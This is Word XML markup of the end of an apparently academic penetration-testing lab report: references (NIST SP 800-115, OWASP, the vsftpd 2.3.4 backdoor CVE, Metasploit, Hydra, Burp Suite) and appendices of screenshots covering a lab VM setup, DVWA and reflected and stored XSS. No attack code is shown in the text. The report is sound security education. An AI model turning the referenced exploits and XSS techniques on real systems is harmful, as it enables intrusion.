      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="6F98DD68" w14:textId="4E6141AF" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Scarfone, K., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Souppaya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, M., Cody, A., &amp; Orebaugh, A. (2008). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Technical Guide to Information Security Testing and Assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NIST Special Publication 800-115). National Institute of Standards and Technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10543620" w14:textId="24BB6F36" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2021). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP Top 10:2021 - The Ten Most Critical Web Application Security Risks</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Open Web Application Security Project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EE185" w14:textId="5E2F2238" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE Corporation. (2011). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2011-2523: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 Backdoor Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Common Vulnerabilities and Exposures (CVE) Database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17039F" w14:textId="2C43830F" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lyon, G. (2009). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Insecure.Com LLC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56579E12" w14:textId="58544089" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Orebaugh, A., Ramirez, G., &amp; Beale, J. (2006). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireshark &amp; Ethereal Network Protocol Analyzer Toolkit</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Syngress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414F854" w14:textId="5C48056F" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rapid7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2024). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploit Framework Documentation: vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Rapid7 Cybersecurity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D63195" w14:textId="58AEF06F" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">van Hauser, THC, &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maciejak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, D. (2023). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hydra: Network Logon Cracker</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Hacker's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3905EE56" w14:textId="77777777" w:rsidR="00763179" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2024). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp Suite Community Edition Documentation: Intercepting HTTP Traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0FBF98" w14:textId="475ED0B5" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Software Foundation. (2024). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apache HTTP Server Version 2.4 Documentation: Security Tips</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6E106" w14:textId="226D4A10" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP Group. (2024). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHP Manual: Security and Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B331DE" w14:textId="6879C064" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MariaDB Foundation. (2024). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MariaDB Server Documentation: Securing MariaDB and Privilege Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50876886" w14:textId="5F503F42" w:rsidR="00563392" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP Foundation. (2024</w:t>
      </w:r>
      <w:r w:rsidR="0051336A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Open Web Application Security Project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8526A8" w14:textId="2F801271" w:rsidR="00763179" w:rsidRPr="00563392" w:rsidRDefault="00763179" w:rsidP="00763179">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP Foundation. (2024</w:t>
      </w:r>
      <w:r w:rsidR="0051336A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r w:rsidRPr="00563392">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Open Web Application Security Project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49B59C" w14:textId="13280AE9" w:rsidR="00A91E1F" w:rsidRDefault="00000000" w:rsidP="00772F2C">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="371747BE">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA35EDA" w14:textId="77777777" w:rsidR="00772F2C" w:rsidRDefault="00772F2C" w:rsidP="00772F2C"/>
    <w:p w14:paraId="3D59648D" w14:textId="77777777" w:rsidR="00AD0952" w:rsidRDefault="00AD0952" w:rsidP="00772F2C"/>
    <w:p w14:paraId="606A2719" w14:textId="77777777" w:rsidR="00A91E1F" w:rsidRDefault="00A91E1F" w:rsidP="00772F2C"/>
    <w:p w14:paraId="15E1B8C2" w14:textId="77777777" w:rsidR="00A91E1F" w:rsidRDefault="00A91E1F" w:rsidP="00772F2C"/>
    <w:p w14:paraId="334C2586" w14:textId="77777777" w:rsidR="00A91E1F" w:rsidRDefault="00A91E1F" w:rsidP="00772F2C"/>
    <w:p w14:paraId="62652FAC" w14:textId="4BC4E740" w:rsidR="00C87B17" w:rsidRPr="00AD0952" w:rsidRDefault="0059188A" w:rsidP="00AD0952">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc228099280"/>
      <w:bookmarkStart w:id="30" w:name="_Toc231851438"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="32ECCD42" w14:textId="679B3C33" w:rsidR="00332046" w:rsidRDefault="00C87B17" w:rsidP="00C87B17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc231851439"/>
      <w:r>
        <w:t>Appendix A: V</w:t>
      </w:r>
      <w:r w:rsidR="00AD0952">
        <w:t xml:space="preserve">irtual </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00AD0952">
        <w:t>achine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Topology Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="119DE5D0" w14:textId="52950031" w:rsidR="00332046" w:rsidRDefault="00332046" w:rsidP="00A26E91">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00332046">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="597FAB9D" wp14:editId="2704A83C">
            <wp:extent cx="5731510" cy="2699385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="197476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61284" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2699385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64BB16" w14:textId="298B9A70" w:rsidR="00AD0952" w:rsidRDefault="00000000" w:rsidP="00332046">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="3E38F13E">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="070AD755" w14:textId="568E6C9A" w:rsidR="00F00222" w:rsidRDefault="00F00222" w:rsidP="0005640A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc231851440"/>
      <w:r>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="001D442D">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001D442D">
        <w:t>LAMP Stack Setup Instructions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="2A869B9F" w14:textId="2A43109C" w:rsidR="00F00222" w:rsidRDefault="001D442D" w:rsidP="0005640A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc231238044"/>
      <w:bookmarkStart w:id="34" w:name="_Toc231851441"/>
      <w:r w:rsidRPr="001D442D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69E0F5AE" wp14:editId="5DAEA655">
            <wp:extent cx="5731510" cy="3375660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29161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13889" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3375660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="184C59AF" w14:textId="0D5C9F1B" w:rsidR="001D442D" w:rsidRPr="001D442D" w:rsidRDefault="00000000" w:rsidP="001D442D">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="75D52796">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39820F5E" w14:textId="27217931" w:rsidR="00AD0952" w:rsidRDefault="0005640A" w:rsidP="0005640A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc231851442"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="001D442D">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B1355C" w:rsidRPr="00B1355C">
        <w:t>Target IP Discovery and Interface Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="041DBE26" w14:textId="06A8E5BC" w:rsidR="006D2833" w:rsidRDefault="006D2833" w:rsidP="006D2833">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18821B44" wp14:editId="5CAF7FC2">
            <wp:extent cx="3649980" cy="2071261"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="129357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0709" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3668319" cy="2081668"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D59361" w14:textId="5FC1DE23" w:rsidR="006D2833" w:rsidRDefault="00000000" w:rsidP="006D2833">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="4A815C61">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1F37C" w14:textId="5998C1AF" w:rsidR="00DD0953" w:rsidRDefault="002B6491" w:rsidP="00AF5DFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc231851443"/>
      <w:r>
        <w:t>Appendix D: D</w:t>
      </w:r>
      <w:r w:rsidR="008A6FB1">
        <w:t>amn Vulnerable Web Application Home Page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="6628062D" w14:textId="2881C8BC" w:rsidR="008A6FB1" w:rsidRDefault="008A6FB1" w:rsidP="008A6FB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15FEACB7" wp14:editId="5FB09F4C">
            <wp:extent cx="4160520" cy="2290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077" b="1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4228822" cy="2328010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBA9C5D" w14:textId="757D4647" w:rsidR="00781519" w:rsidRDefault="0069276C" w:rsidP="008A6FB1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="4749CE54">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6905C1C3" w14:textId="7E65EAB4" w:rsidR="00781519" w:rsidRDefault="00781519" w:rsidP="00781519">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix E: DVWA Reflected and Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC1E787" w14:textId="10F20EAA" w:rsidR="00781519" w:rsidRDefault="00781519" w:rsidP="008A6FB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BF31FF8" wp14:editId="45F1F3F9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3070859</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2921901" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="663533803" name="Picture 663533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22596" cy="2134108"/>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CB7F57D" wp14:editId="5D1A0A01">
            <wp:extent cx="2925445" cy="2108200"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="2087336590" name="Picture 208733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25445" cy="2108200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A829C38" w14:textId="312943FC" w:rsidR="0069276C" w:rsidRDefault="000C62B5" w:rsidP="008A6FB1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="011A0F2A" wp14:editId="1DDFD734">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3177540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2861733" cy="1789941"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapNone/>
            <wp:docPr id="863811896" name="Picture 86381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61733" cy="1789941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0069276C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
